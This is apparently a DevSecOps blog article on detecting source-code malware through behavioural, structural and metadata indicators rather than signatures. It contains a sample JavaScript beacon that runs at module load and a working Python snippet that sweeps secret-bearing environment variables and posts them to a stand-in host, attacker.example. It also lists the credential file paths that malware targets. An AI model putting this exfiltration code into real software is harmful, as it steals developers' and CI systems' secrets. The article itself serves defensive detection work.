Source Code Malware Indicators: What to Look for Beyond Signatures

Source Code Malware Indicators:
What to Look for Beyond Signatures.

Signature-based scanners catch known malware. Novel malware gets through. These are the behavioural indicators, structural anomalies, and contextual signals that betray malicious code regardless of whether it's in any database.

✍️ DevSecOps Team📅 April 2026⏱ 13 min read Malware DetectionSASTAppSec

The Limits of Signature Detection

Signature-based malware scanning works by matching code against known patterns. A hash, a string, a sequence of bytes. It's effective for malware that has been previously identified and catalogued — and ineffective for everything else.

Supply chain malware campaigns are explicitly designed to evade signatures. Attackers generate new variants for each campaign, use obfuscation to change the byte-level signature, and host payloads externally so the package file itself contains no obvious malicious content.

The detection gap: Between the time malware is first deployed and the time it's added to a signature database, it operates undetected. For supply chain attacks targeting CI credentials, the window of first deployment to detection is measured in hours — enough to exfiltrate credentials from every CI run in that period.

Network Behaviour Indicators

Most malware needs to communicate with attacker infrastructure. Network behaviour indicators in source code:

Hardcoded external URLs in unexpected contexts — a utility library making outbound HTTPS calls to a domain unrelated to its stated purpose
Dynamic URL construction — building URLs from string concatenation or encoding rather than using explicit constants
DNS-based communication — dns.resolve(), getaddrinfo() calls with data-derived hostnames
Network calls in lifecycle hooks — any outbound call in postinstall, class constructors, module initialisation, or process exit handlers
Unconditional background requests — requests that fire regardless of application logic, especially on startup

suspicious network call in module initJavaScript
// Red flag: network call executes at module load time
// before any application code runs
const { hostname } = require('os');
const https = require('https');

// Immediately Invoked — runs on require()
(async () => {
  await https.get(
    `https://telemetry.example.com/ping?h=${hostname()}&v=${process.version}`
  ).catch(() => {});
})();

Persistence Indicators

Malware that wants to survive a reboot, container restart, or package reinstall needs persistence mechanisms:

Cron job creation — writing to /etc/cron.d/, crontab -e, or using OS scheduling APIs
Shell profile modification — writes to ~/.bashrc, ~/.profile, ~/.zshrc
Startup service registration — writing systemd unit files, launchd plists, or Windows registry run keys
npm global script injection — modifying ~/.npmrc scripts section
Git hook installation — writing to .git/hooks/ directory in the checked-out repository

Data Access Indicators

What a piece of code accesses tells you a lot about its intent. Suspicious data access patterns:

Environment variable mass collection — iterating all environment variables rather than accessing specific named ones
Credential file access — reading ~/.aws/credentials, ~/.ssh/id_rsa, ~/.npmrc, ~/.docker/config.json
Browser data access — reading browser cookie files, saved passwords, or local storage
Clipboard access — reading system clipboard content (cryptocurrency wallet address replacement)
Keylogging APIs — hooking keyboard events at the OS level

environment credential sweepPython
import os, json, urllib.request

# Mass environment variable sweep — high-confidence malware indicator
sensitive = {
    k: v for k, v in os.environ.items()
    if any(kw in k.lower() for kw in
       ['key', 'token', 'secret', 'password', 'aws', 'gcp', 'azure', 'api'])
}
urllib.request.urlopen(
    'https://attacker.example/collect',
    data=json.dumps(sensitive).encode()
)

Structural Code Anomalies

Malicious code often has structural characteristics that differ from legitimate code:

Unreachable code following legitimate logic — dead code blocks that the static analyser doesn't flag as dead because they're conditionally executed
Asymmetric function complexity — one function that is dramatically more complex than everything else in the file
Comment-code ratio outliers — malicious additions typically have no comments, creating a detectable gap in a well-commented codebase
String-heavy code without surrounding context — large string constants that have no obvious relationship to the function they appear in
Unexpected imports — a library that processes images importing network and process execution modules

Contextual and Metadata Signals

Beyond the code itself, metadata provides high-signal indicators:

New package with high download velocity — organic packages grow slowly; typosquatted packages get installs immediately from developer mistakes
Package published immediately before a CI run — coordinated attacks time publication to coincide with known CI schedules
Maintainer account age vs. package age — a maintainer account created days before publishing a popular-seeming package
Mismatch between package description and actual code — a package claiming to be a utility library that imports network and process modules
Empty or minimal source repository — a published package with no corresponding public source repository, or a repository with one commit

Combine signals for confidence. No single indicator is sufficient. A network call in a utility library might be legitimate telemetry. Environment variable access in a CLI tool is expected. It's the combination — network call + environment variable access + new package + no source repository — that builds high-confidence malware classification.

Source Code Malware Indicators:What to Look for Beyond Signatures.